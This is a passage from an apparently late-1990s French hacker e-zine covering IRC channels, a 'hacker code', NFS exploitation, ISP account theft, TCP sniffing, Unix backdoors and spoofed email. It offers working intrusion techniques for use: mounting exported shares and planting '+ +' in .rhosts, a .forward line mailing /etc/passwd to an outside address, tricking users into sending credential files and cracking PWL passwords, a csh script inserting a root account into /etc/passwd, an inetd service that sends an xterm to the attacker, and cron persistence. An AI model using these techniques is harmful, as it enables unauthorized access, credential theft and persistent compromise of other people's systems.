Sûrement sur IRC (#hack.fr, Undernet (pour le phreak essayer #phreak.fr) ), en tout cas il y a
beaucoup des flammeurs et des crackers, à perte de vue. L'autre moyen consiste à contacter un
groupe local d'utilisateurs d'Unix ou de Linux et d'aller à leurs reunions (#linuxqc ou
#linuxfr)

Q: Quel langage dois-je apprendre en premier?
HTML, si vous ne le connaissez pas dejà. On trouve plein de livres à la couverture brillante et
chamarree sur HTML, qui sont par ailleurs très mauvais, et très peu de bons. Celui que je
prefère est ("http://www.ora.com/catalog/html2/" )HTML: The Definitive Guide Si vous voulez
commencer à; programmer, je vous conseille de commencer par le Pascal ou à la rigueur le visual
basic. Le C est vraiment important, mais beaucoup plus difficile. (Le dephi est aussi un
excellent choix)

Q: Par où dois-je commencer? Où puis-je trouver un IRC (ou Unix) libre?
Je pense qu'il faut que vous veniez absolument sur l'IRC !!. (#hack.fr) Pour devenir un hacker,
il vous faut de la motivation, le sens de l'initiativeet la capacite à apprendre par vous-même.
Alors, c'est le moment ou jamais... (frhack.home.ml.org pour de la documentation)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
* Le code du hackeur *
(par les hackeurs en general)

Voici un petit complement a la FAQ du hacker, voici le code du hackeur. Il existe des règles
partout, le hacking ne fait pas exception à la regle. Bon nous savons que que nous, les
hackeurs avont tendance a plutot conterner les loi et les reglements, mais ces regles sont,
disons, seulement le resultat du bon sens de la majorite des hackeur de metier.

1) Ne jamais endommager ou detruire un système intentionnellement.
2) Ne jamais envoyer de fichiers destructeurs tels que des trojans, virus, ou des remotes
telque " format c: " ou " del *.* "
3) Ne jamais laisser votre vrai nom, adresse, telephone, ou même nick, ils
pourraient vous retracer à partir de votre ses informations.
4) Soyez toujours sur vos gardes dans vos conversations.
5) Ne jamais hacker un ordinateur appartenant au gouvernement.
6) Ne jamais dire aux sysop (superviseur) ou à votre professeur que vous êtes un hacker.
7) Hacker pour apprendre, et non pour detruire.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-= Petites annonces =-
(par Utopiste)

He oui! Nous avons decider d'inclure une partie petite annonce dans notre emag, cepandant
comme nous ne desirons pas nous retrouver avec 4 meg de petites annonces, nous allons limiter
les annonces au nombre d'une trentaine (Veuillez noter cepandant que toutes les autres annonces
seront disponibles via notre site internet (Frhack.home.ml.org) et aussi via notre channel IRC
(#hack.fr, undernet) (quand notre bot sera fini)


1)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-= Extraits de conversation =-
(par les visiteurs de #hack.fr)

Comme nous avons un channel irc assez bien frequente (#hack.fr, undenet) il arrive quelque fois
que nous assistons a des conversations vraiment enrichissante mentalement, ou encore
moralement decourageante... En passant, pour ce qui est de etre op sur le channel je déteste me
faire déranger par qq qui veut un access alors po de /msg utopiste je veux etre op.Nous esperons
aussi avoir un bot bientot, avis au programmeur de script qui serait interesser.

Maintanant montrons quelque extrait de conversation:

..
..
..

(hum ouais, bon changeons d'idee)

/msg #hack.fr Bon tout le monde dit un ti mot qui vo etre publier dans le mag ;)

<PsYkAoS> marque dans le e-mag : Une des grandes dificultes a ete le decalage horaire
* vaToo se demande si utopiste va tenir le choc a la sortie du emag ds kelkes minutes, secondes,
dixiemes de secondes...

(on avait quelque extrait interessant mais j'doit avoir effacer les log sans faire excipres,
tk je vais faire attention pour la fois suivante)


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

* NFS *
(Ktulu)
Bien sur tout le monde a deja entendu parler du NFS ou Network File System.
NFS est un protocole siyué au niveau de la couche application qui permet le
partage des fichiers pour des machines reliées au réseau. Ce partage se fait
de manière totalement transparente ce qui fait que vous n'avez pas
l'impression de travailler sur un fichier dont la source se trouve sur un
disque physiquement différent du votre.

NFS en quelques mots :

NFS fut "inventé" afin de pouvoir mounter des fichiers ou répertoires d'un
machine serveur distante à un machine locale. De la même façon qu'on lit une
disquette ou un cd sur son pc.
Le contrôle d'accés NFS se fait sur l'UID et le GID et non pas sur un loggin
ou un password. Afin d'utiliser correctement NFS, il est donc necessaire de
posseder les mêmes UID et GID sur les deux machines.
Toutes machines peut jouer le rôle de serveur ou de client dans le cas NFS
mais bien souvent il n'y a qu'une seule machine qui est désignée comme serveur.
Il est une chose interressante a constater avec NFS, c'est que NFS est sans
mémoire, c'est à dire : qu'il n'y a pas de mémorisation des opérations
successives effectuées par le serveur sur l'état des clients ou sur les
transactions de fichiers. Par exemple : l'opération d'ouverture n'est pas
memorisée par le serveur mais par le client.

Utilisation de NFS :

Pour connaitre les fichiers exportés par un serveur utilisez la commande
suivante :
# showmount -e www.victime.com
export list for www.victime.com
/usr (evryone)
/sbin (everyone)
/export/secret (toto)
Dans cet exemple, on voit que la machine cible exporte tous les fichiers et
sous repertoires de /usr et /sbin en evryone (cad pour tout le monde) alors
que seule la machine de toto peut mounter /export/secret (mouahahahahahaha).

Pour mounter un système de répertoire sous NFS faites :
# mount -t nfs www.victime.com:/usr /temp

Et voilà les fichiers et sous répertoires de /usr de www.victime.com se
trouve aussi dans votre tmp :p..



ON EN FAIT QUOI ???



Bon, maitenant que vous savez vous servir du NFS, voyons a quoi il peut bien
nous servir :

1: deja a inspecter le systeme. N'oubliez pas que la moindre information
peut etre cruciale (si le /var est exporte vous pouvez alors facilement
recuperer le nom de domaine et donc utiliser NIS pour recuperer les maps
passwd).

2: Si le NFS est mal configure, vous pouvez vous faire passer pour le r00t,
mais bon c'est rare. ;)

3: vous pouvez surtout avoir un shell sur la machine. :) Souvent il y'a des
home directories exportes. Si vous etes chanceux, certains seront 777 (tous
le monde peut ecrire dedans :) ), sinon vous devrez prendre l'identite d'un
user, en trafiquant votre UID/GID, operation assez facile d'ailleurs. Donc
des que vous avez acces a un home directory, mettez lui un fichier .rhosts
comprenants "+ +" dedans :) , ou faites un fichier .forward avec "|/bin/mail
hacker@fuck.edu.xx < /etc/passwd" histoire de recuperer /etc/password .

Ca marche de moins en moins souvent ! c'est une méthode qui a eue son heure
de gloire.

KthuLu the Windows HuNtEr

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
* COMMENT SE CONNECTER GRATUITEMENT SUR INTERNET? *
(jipi)

Pour vous connecter à Internet gratuitement, il vous suffit de piquer
l'acompte Internet de quelqu'un d'autre.

COMMENT?

Si cette personne est connecté avec VIDÉOTRON, il vous suffit de récupérer son
fichier videotrn.ins ce trouvant dans le répertoir de Windows.
Vous allez sur IRC et vous demandez à cette personne de vous envoyer
son fichier videotrn.ins, si il est vraiment cave, vous lui demandez
simplement de taper: /dcc send votre_pseudo c:\windows\videotrn.ins
en lui disant que vous l'avez perdu. (GNARF!) Mais si s'il a un quotient
supérieur à 100, il ne voudra pas. Donc, à ce moment vous utiliser
des méthode comme *control.exe*. Vous lui dites que vous avez fait un
logiciel pour des wav et il serait aimable de le testé blablabla...
Pour nous, on veut seulement qui clique dessus (control.exe) :) vous pouvez aussi
utiliser la méthode nbtstat (mentionné plus loin).
Quand vous avez son vidéotrn.ins, vous n'avez cliquer dessus. Après vous vous rendez dans
Poste de travail, Accès réseau à distance, et une nouvelle connection
dois être là, pour trouver ce qui se cache derrière les *********
utilisez le logiciel *Revelation v1.1*.

Pour ceux qui sont sur INFONIE, vous devez prendre leur fichier
infonie.ini ce trouvant le répertoir de windows en utilisant les
méthodes que j'ai mentionnées plus haut.
Une fois que vous avez le fichier, ouvrez-le avec Note Pad.
Ca devrais aficher:
[identification]
subscription=000000000000000 <- Ça devrait être un numéreau à
..le reste on s'en fou... 15 chiffres. Notez-le!

Allez dans poste de travail, Accés réseau à distance et faite une nouvelle connection et appelez là infonie, le numéreau de téléphone pour la France est 0836061317. Dans nom d'utilisateur marquez:
inf1/000000000000000@infonie.fr <- Les 000... c'est le numéreau que vous avez notez tentôt

Dans mot de passe: (mettez rien, laissez blanc...)


Si vous voulez voler l'acompte de quelqu'un qui n'est pas sur vidéotron
ni sur infonie. (Ten que cette personne se connecte en dial-up sous Windows95/98/NT) vous pouvez aussi utiliser cette méthode même si la personne est sur Infonie ou sur Vidéotron.

Vous n'avez qu'a piquer son fichier *.pwl se trouvant dans le répertoir
de Windows et de le décripter avec un logiciel qui décripte les .pwl
Le meilleur est *PWL's Hacker* et la commande sous DOS est:
pwlhack /list:e le_file.pwl le_login <- Le login est le nom du
.pwl. Si le .pwl se
nomme RFRASER.pwl donc le
login est REFRASER
il vous mande le passowrd, vous ne marquez rien et apuyez sur ENTER
Ça va écrire plein d'affaires...

les dernières affaires c'est ce que l'on veut, ca marque exemple:

-[Type]-[The resource location string]--------------[Password]-
Url/ winbeta.microsoft.com/winbeta.microsof
t.com 326538:tbc6ze9d6hcr3u
Dial *Rna\jlepage\jlepage joha3446
Dial *Rna\Videotron Ltee 2\vluxwiei 003169
Url/ NNTP :
---------------------------------------------------------------
_ Indexed Entryes: 3; Number of resources: 6.


ET CA SORT TOUS LES PASSWORD DE WINDOWS!!


* = logiciel, si vous ne les possédez pas, vous pouvez les trouvez sur le site web de hack.fr (www.frhack.org)
ou encore me les demander par e-mail, jipi@mail.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-= Front page 1998 =-
(par opak)
La sécu(rité) c'est rien, en abuser c'est...rien aussi.
Après : Je fait une fausse manip' sous Front Page 97 et j'efface mon disque
dur, voici le dernier venu de la gamme Kro$oft : Billou et ses distributeurs
n'ont pas pris de cours sur la sécurité.
Je découvris sur le CD-ROM d'un mag' quelconque donc le titre principal
était : Une version complète de Front Page 98 Version BETA 2. Et, il s'était
glissé comme un petit (mais alors tout petit texte) : A utiliser avant le
1er Janvier 1998. Bref, la version était limitée. Alors j'exploite bien le
logiciel et, un (beau) jour, je me décidais a augmenter la date de l'horloge
Zindoz en humm… disons 1999. Une question se posait : Y' aura t-il un petit
message me résumant le petit texte du CD ou tout simplement le célèbre écran
bleu que tout le monde connaît lors de la prochaine exécution ?
L'alerte a finalement penché sur le message.
Mais attends ! Si je remet la date en 1997 que se pass...Ahhhh !
Horreur, ça remarche !
Voilà pourquoi j'utilise depuis maintenant près de 8 mois Front Page 98 (qui
marche très bien a ce jour...) alors que j'ai payé le journal 35 francs et
que Front Page 98 coûte 1350 fr. et des poussières, faites le calcul...
P.S : Alors SVP, les distributeurs, la prochaine fois, essayez de faire des
protections un peu plus sérieuse parce que c'est même pas drôle, on a même
plus besoin de déplomber...Merci !
Opak
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

ë$$$$$$$$$$$$$$$$$$$$$ë
ø ø
ø Le sniffing TCP ø
ø ø
ë$$$$$$$$$$$$$$$$$$$$$ë

par Fedaikin

Ce petit texte va tenter d'expliquer succintement le format des trames TCP et UDP de fa‡on a
comprendre les techniques de sniffing et aussi des programmes tels que les syn floods.
Je ne pretend pas vous expliquer totalement le sniffing, mais je vous apporte les bases.

Disclaimer : Je ne vous incite pas du tout à utiliser ces renseignements pour pirater un systŠme
informatique quel qu'il soit. Ces informations sont donn‚es a titre purement informatif, je veux
juste partager avec vous mes connaissances sur les reseaux informatiques. Autre point tres important,
l'utilisation de la commande tcpdump est totalement illegale et je ne vous incite pas a l'utiliser.
Si vous piratez a l'aide du contenu de ce texte sachez que je ne m'en tient pas responsable.


I)A quoi peut bien servir le sniffing?

Le sniffing permet de recuperer plein d'infos tres interessantes sans se fatiguer.
Atention, tout ce qui suit ne concerne que les reseaux locaux a diffusion du type Ethernet. De
plus, cela ne marchera pas lors d'une connection windows(95/nt) car les pass sont cryptes dans ce cas
(Et oui on ne peut l'utiliser que sous Linux et des connections Linux).Et bien c'est tout simple, on ecoute ce qui se dit sur le reseau et on s'en sert ;)
Je m'explique, dans un reseau les postes discutent(vous suivez ?) et echangent certains
trucs tres interressants; notament les PASSWORDS ;)
Vous me direz que c'est bien beau mais les pass seront cryptes...Et bien magie des reseaux, NON!
NON et RE-NON!!!Et c'est la que c'est marrant, mˆme tres marrant :))
Pour les recuperer, il y a plusieurs methodes: utiliser un sniffer chope sur le ouaibe (lamer),
faire son sniffer(plus chaud,mais si bon),ou utiliser un bon tcpdump(on peut l'utiliser
pour le prog aussi)
Perso j'utilise tcpdump, c'est assez sympa et en plus ca oblige a comprendre. C'est pourquoi je
vais vous expliquer le fonctionnement des trames TCP et UDP en detail meme si on ne se servira
pas de tout.


II)Le format des trames
Avant tout, il me faut vous expliquer … quoi ressemblent les trames TCP et les trames UDP.
Selon la connection demand‚e, on utilise le protocole de transport TCP ou UDP. Certains utilisent
un seul protocole et d'autres melangent les deux. Ainsi un talk se connecte a l'aide de UDP puis
transmet les donnees par TCP.

Comme on m'a souvent dit un bon schema vaut mieux qu'un long discourt. Je vais donc faire le
schema de l'en-tete TCP:
___________________________________________________________________________
/\ | port source (16 bits) | port destination (16 bits) |
| |-------------------------------------------------------------------------|
| | numero de sequence (32 bits) |
| |-------------------------------------------------------------------------|
| | numero de d'accuse de reception (32 bits) |
20 | |-------------------------------------------------------------------------|
octets| |long d'en-tete | reserve |URG|ACK|PSH|RST|SYN|FIN| taille de la fenetre |
| | (4 bits) |(6 bits) | | | | | | | (16 bits) |
| |-------------------------------------------------------------------------|
| | somme de controle TCP | pointeur urgent |
| | (16 bits) | (16 bits) |
\/ ---------------------------------------------------------------------------
<------------------------------------------------------------------------>
32 bits

On a donc une trame de ce type:
_________________________
| En-tete TCP| Donn‚es |
| 20 octets | 6 … 1460 |
------------------------

N'ayez pas peur je vais vous expliquer tout de suite tous les champs.
port source : c'est le port TCP de l'emetteur (pour la reponse).
port destination : c'est le port du destinataire.
numero de sequence: permet d'identifier le segment TCP. Il est egal au nombre d'octets envoyes.
Ils sont aleatoires au debut, puis sont remis … 0 d‚s le 2øechange.
num d'accuse de reception : Il indique le numero de sequence de la trame suivante.
longueur d'en-tete: donne la longueur de l'en-tete en mots de 32 bits (ici 5).Vous comprenez
mieux mon schema hein ;)
reserv‚ : aucun interet
flag URG (1 bit) : … 1 si le pointeur urgence est en cours d'utilisation.
flag ACK " : … 1 si le numero d'accuse de reception est bon.
flag PSH " : (PuSHed en english) on ne passe pas par un buffer si … 1 (bof)
flag RST " : stoppe la connexion immediatement si … 1.
flag SYN " : ahh + interessant.SYN=1 et ACK=0 =>demande de connection
SYN=1 et ACK=1 =>confirmation de connection
flag FIN " : sert a dire qu'on romp la connexion.
taille de la fenetre : donne le nombre d'octets qu'on peut mettre apres l'octet aquitte.
somme de controle : controle d'erreur de l'en-tete.
pointeur urgence : decalage en octets … partir du numero de sequence courant pointant sur des
donn‚es urgentes.

Voila, mais ceci dit n'ayez pas peur car la plupart de ces informations ne nous serviront pas a
grand chose.
Les bits a retenir sont surtout les flags SYN et ACK et la longueur totale de l'entete.
Les adresses pourront egalement etre tres utiles ;)


En-tete UDP:
___________________________________________________________________________
/\ | port source (16 bits) | port destination (16 bits) |
8 | |-------------------------------------------------------------------------|
octets| | longueur | cheksum |
\/ |-------------------------------------------------------------------------|
<------------------------------------------------------------------------>
32 bits

On a donc une trame de ce type:
_________________________
| En-tete TCP| Donn‚es |
| 8 octets | 0 … 1472 |
------------------------
logueur : longueur en octets du segment UDP(en-tete+donnees).
cheksum : code de controle de l'en-tete


III)Deroulement de la connection
Maintenant passons a la connexion en elle meme.
Il y a donc deux protocoles a surveiller: TCP et UDP. Vous allez me dire lequel regarder? Et bien
malheureusement on ne peut pas le savoir a l'avance car chaque application a un deroulement
specifique. Par exemple un talk se connecte d'abord en UDP puis passe en TCP. Donc la il faudra
capter les deux au debut et par la suite ...


Connection TCP:
Il y a tout d'abord trois trames qui servent a la connexion a proprement parler. La premiere est
envoyee par le client au serveur. Dans cette trame(et c'est la qu'on voit ceux qui on suivi
jusqu'ici :)) le flag SYN a 1 et tous les autres a 0; on a ici une demande de connexion.
La deuxieme (serveur => client) a les flags SYN et ACK a 1; ce qui correspond … une confirmation
de connection.
La troisieme (client => serveur) a le bit ACK a 1 et les autres a 0. On est connecte.
C'est la que s'expliquent les syn flood. On envoi plein de trames avec une demande de connection d'une
machine dont on a spoofe l'adresse et la machine destinataire renverra un tas de trame de
confirmation, jusqu'a ce que la machine qui lui a envoye la demande lui reponde (ce qui ne se
passera jamais mouahahahahah). La machine cible se trouve donc fortement ralentie ;)


Connection UDP:
Elle se passe en quatres etapes. La premiere trame est envoyee par le client au server pour faire
la demande de connection.
La deuxieme est la reponse du server au client pour la demande de connection.
La troisieme (client => server) est pour une sorte de deuxieme demande de connection.
La quatrieme (server => client) est pour la confirmation de connection finale. La communication est etablie, et les infos interressantes
commencent :)

IV)La commande TCPDUMP
Donc maintenant que vous savez comment fonctionnent les trames TCP et UDP, il vous faut savoir
comment les chopper. La encore il y a plusieurs solutions (comme je l'ai dit au debut):
utiliser un sniffer choppe sur le ouaibe
se faire le sniffer
ou utiliser la commande tcpdump
La commande tcpdump est une commande linux qui capture les trames d'un type precis (TCP/UDP...).
Je vais donc vous expliquer les options de cette commande.
Pour ecouter une connection TCP par exemple entre la machine neuneu et son server, on tapera la
commande suivante:
tcpdump -i eth0 host neuneu and host server and tcp
Je commante : le -i eth0 est une option qui capture les trames sur l'interface eth0(ethernet)
host donne les deux machines entre lequelles on ecoute
tcp pour

  
preciser qu'on veut les trames TCP (on peut remplacer par UDP)
on peut ajouter un port precis en tapant "and port numero" ou "and port ftp"

Options de tcpdump:
-e : affiche l'en-tete de la couche liaison de donn‚es
-t : evite d'afficher l'heure d'arriv‚e des trames
-i bla : capture les trames sur l'interface bla
-s nbr : affiche les nbr premiers octets
-vv : affiche beaucoups d'informations sur la trame (trop pour nous)
-x : affiche la trame en hexadecimal(sauf l'en-tete de la couche liaison de donn‚es)

Filtres :
Ils faut preciser le protocole a ecouter : arp, icmp, tcp, udp, ip
Si vous voulez ecouter plusieurs machines tapez : host neuneu1, host neuneu2 and host server
Vous pouvez egalement placer les adresses ip des machines au lieu de leur noms.
Vous pouvez encore restreindre l'ecoute a un(ou plusieurs) port special:port 23, port ftp
and port www.

Voila, pour realiser votre sniffer, vous pouvez ecrire un script shell qui execute la commande
tcpdump avec une redirection et qui sera lance par le .profile (un conseil cachez le prog). Ou
sinon vous pouvez lancer la commande comme ca depuis votre propre PC en esperant qu'il y ait une
connection au moment ou vous ecoutez.

Il est vrai qu'il existe des methodes pour faire des programmes en C ou autre; mais ceci donnera
lieu a un autre texte(et oui vous entendrez encore parler de moi ;))


V)Annexe
Il y a tout de mˆme un remede a cette ecoute clandestine(et mˆme deux). On peut utiliser des
bridges au lieu d'utiliser des hubs; on ne sera plus en mode diffusion(il y a une connection directe
physique entre les machines) mais on fait croire qu'on diffuse encore a tout le monde. On ne peut
plus sniffer.
On peut aussi utiliser SSH au lieu d'utiliser telnet. SSh est beaucoup plus securise car il crypte
les pass.



J'ai fini, et si vous avez des questions (ou des commantaires) vous pouvez me mailer a cette adresse:
fedaikin@altern.org
Ou vous pouvez me retrouver sur les servers irc undernet.


Je tient a dire un grand merci a BuBle (a qui je doit beaucoups et qui est un bon pote),un grand
a KthuLu aussi. Je remercie aussi toute l'equipe de frhack et je passe un enorme bonjour a tous
mes potes de #hack.fr

fedaikin@altern.org



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-
-= Back door unix =-
(par buble)

Ce petit texte ne se pr‚tend pas exhaustif bien au contraire, mais propose seulement
d'expliquer quelques BackDoor.

1/ L'ajout d'un compte avec l'UID … 0
C'est ‚videmment la maniŠre la plus simple mais aussi la moins efficace : la modification est
flagrante. De plus le fichier passwd est une des premiŠre chose que l'admin va regarder s'il
pense ˆtre victime d'une attaque. N‚anmoins il peut ˆtre pratique de la connaŒtre. Avant de
rajouter un acompte, lister le fichier passwd pour voir comment les champs de commentaires sont
remplis. Voici ci-dessous un script permettant de rajouter un acompte au milieu du fichier
passwd

# Ajoute
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
set linecount = `wc -l < /etc/passwd` # Compte le nombre de lignes
cd # Retourne dans le Home directorie
cp /etc/passwd ./temppass # Copie le fichier passwd dans un fichier temporaire
echo passwd file has $linecount[1] lines. # Dis le nombre de ligne du fichier passwd
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "dupond::0:0:etudiant 1 ann‚e/:/bin/bash" >> ./xaa # A remplir en fonction des ligne de /etc/passwd
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...

Note: NE CHANGEZ JAMAIS LE MOT DE PASSE DU ROOT !

Note': Sur certains OS, tels que SUN OS, il est impossible pour un utilisateur ayant son UID … 0 de se connecter … distance, il
faut donc se connecter en tant qu'utilisateur normal puis faire un su utilisateur_root.
Dans le mˆme ordre d'id‚e vous pouvez d‚verrouillez un acompte d'administration tel que Synk qui possŠde un uid a 0 ou en
encore un compte verrouill‚ depuis longtemps. Pour ce faire, retirez simplement le caractŠre '*' du 2eme champs

Note: sur certains systŠmes Unix, l'ajout d'un caractŠre quelconque dans le champ UID d'un utilisateur, met l'UID de cette
personne … 0.

2/ Rajout d'un service
Une autre m‚thode est souvent bien plus efficace, elle consiste … rajouter un service qui pourra ex‚cuter … distance, par
un telnet sur le port cr‚e … cet effet, un script shell effectuant la/les commande(s) souhait‚e(s). Mais tout d'abord je vais
expliquer 2 fichiers: /etc/services et /etc/inetd.conf.
/etc/services est le fichier qui fait le lien entre les ports de la couche transport et les services correspondants, exemple :

ftp 21/tcp file tranfert protocol
(1) (2)/(3) (4)

Le champs (1) repr‚sente le nom du service il fait le lien avec le champ (1) de /etc/inetd.conf. Le champ (2) est le num‚ro
de port allou‚. Le champs (3) est le protocole de la couche transport utilis‚. Le champs (4) est r‚serv‚ au commentaire.
/etc/inetd.conf est le fichier permettant de configurer le d‚mon inetd qui est le d‚mon qui prend en charge les d‚mons tels
que in.ftpd ou in.telnetd. Ce fichier est pr‚sent‚ de la maniŠre suivante.
ftp stream tcp nowait root /usr/sbin/in.ftpd
(1) (2) (3) (4) (5) (6) (7)


Le champ (1) repr‚sente le service, il doit ˆtre pareil au champs (1) de /etc/services. Le champs (2) est le type de paquet
envoy‚ : Si le protocole est TCP ce sera des trames si c'est UDP se sera des datagrammes. Le champs (3) est le protocole
utilise. Le champs (4) est je sais pas quoi. Le champs (5) est avec quel UID est lanc‚ le d‚mon. Le champs (6) est
l'emplacement sur la machine du d‚mon. Le champ (7) permet de donner les option avec lesquels le d‚mon sera lanc‚,
dans cet exemple le d‚mon est lanc‚ sans options suppl‚mentaires.

La m‚thode consiste donc a modifier les deux fichiers pr‚sent‚s ci-dessus afin de pouvoir ex‚cuter un script shell ou un
programme C … distance. Le programme peut par exemple rajouter une ligne dans /etc/passwd ou bien un "+ +" dans le
rhosts du root. La limite du programme est celle de votre imagination.

Exemple:

Ajouter la ligne suivante dans /etc/services:
evil 666/tcp root of all evil

Ajouter la ligne suivante dans /etc/inetd.conf:
evil stream tcp nowait root /usr/sbin/in.yepd

Cr‚er le script shell suivant, appelez le in.yepd, mettez les droits d'ex‚cution du script, et mettez le dans /usr/sbin/
#!/bin/sh
#Ce script permet de se faire envoyer un xterm
xterm -display votre_addresse_ip:0 &
#Ce script ne marche ‚videmment que si vous avez une adresse IP fixe

3/ Par le sendmail
Cette m‚thode est bas‚e sur les fonctionnalit‚s de r‚emission du courrier electronique, notamment grƒce au fichier .forward.
Ce fichier permet de r‚exp‚dier du courrier destin‚ a quelqu'un vers une autre boite au lettre ‚lectronique. De plus Ce fichier
peut aussi ex‚cuter des commandes lorsque l'utilisateur re‡oit un mail. Ce fichier doit ˆtre mis dans le home directorie pour
b‚n‚ficier de ses fonctionnalit‚s.

Exemple de .forward ( appartient a reagan@rigoler.com)
coolspot@7up.com
wistiti@fbi.com
"|/bin/ping -l 1 whitehouse.gov"

Quand un mail est envoy‚ … reagan, il est renvoy‚ automatiquement a coolspot chez 7up.com, et a wistiti a fbi.com. De plus,
un ping est effectu‚ sur la maison blanche.

Une autre m‚thode dans un mˆme ordre d'id‚e est de rajouter une ligne dans /etc/aliases qui ex‚cutera un script shell
exemple:
evil: "|/ma/commande"
ainsi quand un mail sera envoy‚ a evil, /ma/commande sera ex‚cut‚.

Note: je n'ai pas r‚ussi a cr‚er des backdoor sendmail sous linux red hat 5.0. Si quelqu'un sait comment faire qu'il me mail …
BuBle@caramail.com

4/ Les crontabs
Le d‚mon cron est un d‚mon permettant d'ex‚cuter des commandes … intervalles r‚gulier. Il se configure par chaque utilisateur.
Pour ajouter un service utilisant crond, il faut ‚diter le fichier /var/spool/crontab/nom_d'utilisateur ayant la forme suivante:

5 15 * * * /bin/pti_programme
(1) (2) (3) (4) (5) (6)

Les cinq premiers champs permettent de r‚gler le moment ou la commande est lanc‚, le 6eme champs est la commande a
effectuer.
Le champs 1 correspond au minutes(de 0 a 59)
Le champs 2 correspond au heures(de 0 a 23)
Le champs 3 correspond au jour du mois(de 1 a 31)
Le champs 4 correspond au mois de l'ann‚e(de 1 a 12)
Le champs 5 correspond au jour de la semaine(de 0 a 6. le 0 est le dimanche)

Donc dans l'exemple ci-dessus, pti_programme est lanc‚ … 15h 5min tous les jours

La technique consiste donc a rajouter une crontab qui v‚rifiera par exemple si a ligne mise dans /etc/passwd est toujours
pr‚sente:

#!/bin/sh
# Ce scripte permet de remettre une ligne dans /etc/passwd

if !(grep dupond::0:0:etudiant 1 annee:/:/bin/bash /etc/passwd > /dev/null) ; then
# La ligne est non pr‚sente
/tmp/ajoute 2>/dev/null
else
# La ligne est pr‚sente
exit 0
fi


5/ Trafiquer un programme
La c clair il faut r‚cup‚rer les sources d'un programme qui doit obligatoirement avoir le bit suid, tel que login ou ... et rajouter
un bout de programme du style:

si l'argument 1 est truc alors
{
met l'uid a 0
met le gid a 0
lance un shell
}

quand le programme sera lanc‚ avec l'argument truc, le prog te passe root.

Note cette technique n‚cessite d'avoir d‚j… un accŠs normal au systŠme.

6/ La modification du d‚mon telnet
Dans ce cas, il faut r‚cup‚rer la source du d‚mon telnet utilis‚ par cible.com et la modifier de telle maniŠre que lorsque l'on
demande un login, on rentre une certaine variable ex‚cutant directement une session telnet. Je ne me suis pas trop pench‚ sur
la maniŠre de coder ce type de backdoor, mais sachez que c'est, je pense un des meilleur types de backdoor possibles.

Il existe encore d'autres type de backdoor notamment certaines allant modifier la valeur des registres m‚moires du systŠme
mais je ne les ai pas pour l'instant ‚tudi‚s.

Voil… ce premier texte sur les backdoors ‚crit par mes soins est finis si vous avez des question, commentaires, correction,
ou informations suppl‚mentaires, vous pouvez m'envoyer un mail a BuBle@altern.org ou me retrouver sur #hack.fr sur le
r‚seau Undernet.

Remerciements:
Je tient a remerci‚ ici Cleb, qui ma ouvert la voie quand j'‚tais franchement un d‚butant, je tient a saluer ici aussi mes potes: Xi9, Kthulu, les membres de hack.fr et tous les gens qui vont sur #hack.fr.

BuBle@altern.org


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-= email anonyme =-
(par Utopiste)
Bon, j'sais c'est pas mal newbie comme mais comme j'en ai un peu marre que le monde utilise des
anonymous mailer sans vraiment savoir comment ca fonctionne, decider d'expliquer les principes
de bases, possiblement que je ferai la meme chose pour mirc via telnet dans le prochain # de
frhack zines.

Marche à suivre:

* Demarrarer son client Telnet favori () et se connecter sur un serveur mail sur le port 25
(c:\Windows\Telnet.exe collanaud.qc.ca 25)

* Une ligne ressemblant a ceci est suppose apparaître:

* Ensuite inscrivez ceci :

HELO UnServeurAnonymous.com
MAIL FROM:VotreNick@CeQueVousVoulez.com
RCPT TO:Admin@Compagnie.Polluante.com
DATA
subject: Survie de notre planète
Quand aller vous arrèter de polluez notre planète !!!!
.
QUIT

(Certain serveur mail note l'adresse IP, alors ils est toujours prudent de passer par une
passerelle pour eviter d'être retraçable...)

(Avant d'innonder le net de vos messages, envoyer en dont un à vous, question de verifier
si ca fonctionne bien)

(Si ça fonctionne, n'hesiter pas à envoyer des messages à tous les site raciste ou de pédophilie
ou encore a mikro$oft ou les hell canada)

(Pour plus d'information, veuillez lire le RFC822)

En prime, voici la liste des serveurs mail anonymous (si un serveur ne repond pas ou est hors
d'usage veuillez me communiquer un message question que je remettre ma liste
à jour...)

mcl.ucsb.edu pentagon.mil unix.newnorth.net
wam.umd.edu mail2.sas.upenn.edu cps1.starwell.com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-= L'exploit NetBios =-
